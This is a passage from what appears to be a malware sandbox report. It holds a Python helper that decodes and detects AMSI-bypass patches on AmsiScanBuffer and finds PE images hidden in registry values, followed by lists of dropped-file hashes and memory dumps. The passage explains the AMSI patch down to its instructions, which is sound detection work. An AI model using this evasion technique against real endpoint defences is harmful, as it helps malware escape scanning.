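            out.append("mov eax, 0x%08X" % int.from_bytes(code[i + 1:i + 5], "little"))
            i += 5
        elif op in (0x31, 0x33) and i + 1 < len(code) and code[i + 1] == 0xC0:  # xor eax, eax
            out.append("xor eax, eax")
            i += 2
        elif op == 0xC3:                                                         # ret
            out.append("ret")
            i += 1
        elif op == 0xC2 and i + 3 <= len(code):                                  # ret imm16 (stdcall cleanup)
            out.append("ret 0x%X" % int.from_bytes(code[i + 1:i + 3], "little"))
            i += 3
        else:
            out.append("db 0x%02X" % op)
            i += 1
    return out


def describe_amsi_patch(code: bytes) -> dict:
    # A stub is "set eax to a constant, then return" with nothing else executed before the ret.
    insns = disassemble_stub(code)
    eax, stub, cleanup = None, False, 0
    for ins in insns:
        if ins.startswith("mov eax, "):
            eax = int(ins.split(", ")[1], 16)
        elif ins == "xor eax, eax":
            eax = 0
        elif ins.startswith("ret"):
            stub = eax is not None
            cleanup = int(ins.split()[1], 16) if " " in ins else 0
            break
        else:
            break  # a real instruction before any ret: not an early-return stub
    return {
        "instructions": insns,
        "hresult": HRESULT_NAMES.get(eax, "unknown") if eax is not None else None,
        "stack_cleanup": cleanup,  # 0x18 = six 4-byte stdcall arguments, AmsiScanBuffer's count on x86
        "is_early_return_stub": stub,
    }


def is_patched_prologue(prologue: bytes) -> bool:
    # For a scanner that reads the first bytes of amsi!AmsiScanBuffer from a live process:
    # the real function never begins with a constant return. Comparing against the on-disk
    # image is stronger, but this catches every mov/xor + ret variant without a reference copy.
    return describe_amsi_patch(prologue[:8])["is_early_return_stub"]


def looks_like_pe(blob: bytes) -> bool:
    # [Reflection.Assembly]::Load needs a PE image, so a registry value that parses as one
    # (MZ header, e_lfanew pointing at a PE signature) is what to hunt for under HKLM\SOFTWARE.
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed: 0x44 bytes with MZ at 0, e_lfanew = 0x40 and "PE\0\0" at 0x40; not a real binary.
FAKE_PE = b"MZ" + bytes(0x3A) + (0x40).to_bytes(4, "little") + b"PE\0\0"
```

Both patches decode to a constant E_INVALIDARG return; only the x86 one needs ret 0x18 because the 32-bit AmsiScanBuffer is stdcall and must pop its own arguments. The script also leaves a second artefact worth hunting: a PE image stored as a registry value, which looks_like_pe would flag when run over the REG_BINARY values under HKLM\SOFTWARE.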
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\[New]344334.exe
  Filesize: 216.7MB
  MD5: 4c8170e025715b8a9b7138fcab2f2136
  SHA1: fc913d276bab173ef244b7c14b3944af1272a5e8
  SHA256: 926ad6cb6c78a443dcfd64c7ad79284586971b0790c1216c930d9f832db301ca
  SHA512: ce46c4eac110bb0dbf757c6e60b37a7eb09fafe76c734567e02e3e6c0bf8a0aeddf1012969de178c79abd5d9850d834a30e07f144f26e544d3d6c26c9b519ff3
- C:\Users\Admin\AppData\Roaming\[New]344334.exe
  Filesize: 218.2MB
  MD5: cdd91fb1232cb1e2bd51e5d9af14c2b0
  SHA1: a8761ce93218ed85160baf2d8d18ffe54889ad94
  SHA256: 4634c002868ec687c62c013799fd18a3ad9854c3542a4863014ed7c5dc27b7c4
  SHA512: b886db275eacc66f3315cd88fb889f2bbfc7cbece391baeccd454a7cc6e4ba8fb5dfccd9b026b042ebfc582f1b71e9be83147087f8b621671668ae9c45dde87b
- C:\Users\Admin\AppData\Roaming\ger.exe
  Filesize: 1.9MB
  MD5: ebc48d85bce66e7534e695c2eb990fc7
  SHA1: de42ec460cbcee1d8d1629d41d0764eb16799361
  SHA256: 32fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c
  SHA512: da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8
- C:\Users\Admin\AppData\Roaming\ger.exe (second capture; same size and hashes as the entry above)
- memory/372-185-0x0000000000000000-mapping.dmp
- memory/604-204-0x00007FFE32050000-0x00007FFE32060000-memory.dmp (64KB)
- memory/864-158-0x0000000000000000-mapping.dmp
- memory/1008-186-0x0000000000000000-mapping.dmp
- memory/1060-135-0x0000000000D80000-0x0000000000FC8000-memory.dmp (2.3MB)
- memory/1060-136-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmp (10.8MB)
- memory/1060-130-0x0000000000000000-mapping.dmp
- memory/1060-156-0x0000000003B60000-0x0000000003B72000-memory.dmp (72KB)
- memory/1108-171-0x0000000000000000-mapping.dmp
- memory/1112-141-0x0000000000BC0000-0x0000000000D9D000-memory.dmp (1.9MB)
- memory/1112-133-0x0000000000000000-mapping.dmp
- memory/1408-169-0x0000000140000000-0x0000000140057000-memory.dmp (348KB)
- memory/1408-164-0x0000000140000000-0x0000000140057000-memory.dmp (348KB)
- memory/1408-162-0x0000000140000000-0x0000000140057000-memory.dmp (348KB)
- memory/1408-161-0x0000000140002348-mapping.dmp
- memory/1408-160-0x0000000140000000-0x0000000140057000-memory.dmp (348KB)
- memory/1472-168-0x0000000000000000-mapping.dmp
- memory/1580-167-0x0000000000000000-mapping.dmp
- memory/1800-197-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmp (760KB)
- memory/1800-195-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmp (2.0MB)
- memory/1800-189-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmp (760KB)
- memory/1800-188-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmp (2.0MB)
- memory/1800-177-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmp (10.8MB)
- memory/1812-150-0x0000000004E40000-0x0000000004EA6000-memory.dmp (408KB)
- memory/1812-142-0x0000000000000000-mapping.dmp
- memory/1812-154-0x0000000005A70000-0x0000000005B02000-memory.dmp (584KB)
- memory/1812-153-0x0000000005F20000-0x00000000064C4000-memory.dmp (5.6MB)
- memory/1812-143-0x00000000005D0000-0x00000000005F2000-memory.dmp (136KB)
- memory/1860-180-0x0000000003BD0000-0x0000000003C36000-memory.dmp (408KB)
- memory/1860-181-0x0000000004B00000-0x0000000004B1E000-memory.dmp (120KB)
- memory/1860-176-0x00000000034F0000-0x0000000003526000-memory.dmp (216KB)
- memory/1860-178-0x0000000003CC0000-0x00000000042E8000-memory.dmp (6.2MB)
- memory/1860-179-0x0000000003AB0000-0x0000000003AD2000-memory.dmp (136KB)
- memory/2116-200-0x0000000000000000-mapping.dmp
- memory/2184-203-0x0000000000000000-mapping.dmp
- memory/2416-170-0x0000000000000000-mapping.dmp
- memory/2600-175-0x0000000000000000-mapping.dmp
- memory/2684-187-0x0000000000000000-mapping.dmp
- memory/2732-184-0x0000000000000000-mapping.dmp
- memory/2796-166-0x0000000000000000-mapping.dmp
- memory/3284-159-0x0000000000000000-mapping.dmp
- memory/3472-183-0x0000000000000000-mapping.dmp
- memory/3476-173-0x0000000000000000-mapping.dmp
- memory/3740-174-0x0000000000000000-mapping.dmp
- memory/3768-182-0x0000000000000000-mapping.dmp
- memory/3840-172-0x0000000000000000-mapping.dmp
- memory/4124-147-0x0000000000000000-mapping.dmp
- memory/4132-202-0x0000000000000000-mapping.dmp
- memory/4392-151-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmp (10.8MB)
- memory/4392-152-0x000001E67F150000-0x000001E67F172000-memory.dmp (136KB)
- memory/4392-149-0x0000000000000000-mapping.dmp
- memory/4520-163-0x0000000000000000-mapping.dmp
- memory/4528-157-0x0000000000000000-mapping.dmp
- memory/4644-191-0x00000001400024C8-mapping.dmp
- memory/4644-199-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmp (760KB)
- memory/4644-192-0x0000000140000000-0x0000000140040000-memory.dmp (256KB)
- memory/4644-196-0x0000000140000000-0x0000000140040000-memory.dmp (256KB)
- memory/4644-193-0x0000000140000000-0x0000000140040000-memory.dmp (256KB)
- memory/4644-190-0x0000000140000000-0x0000000140040000-memory.dmp (256KB)
- memory/4644-201-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmp (2.0MB)
- memory/4644-194-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmp (2.0MB)
- memory/4888-155-0x0000000000000000-mapping.dmp
- memory/4904-165-0x0000000000000000-mapping.dmp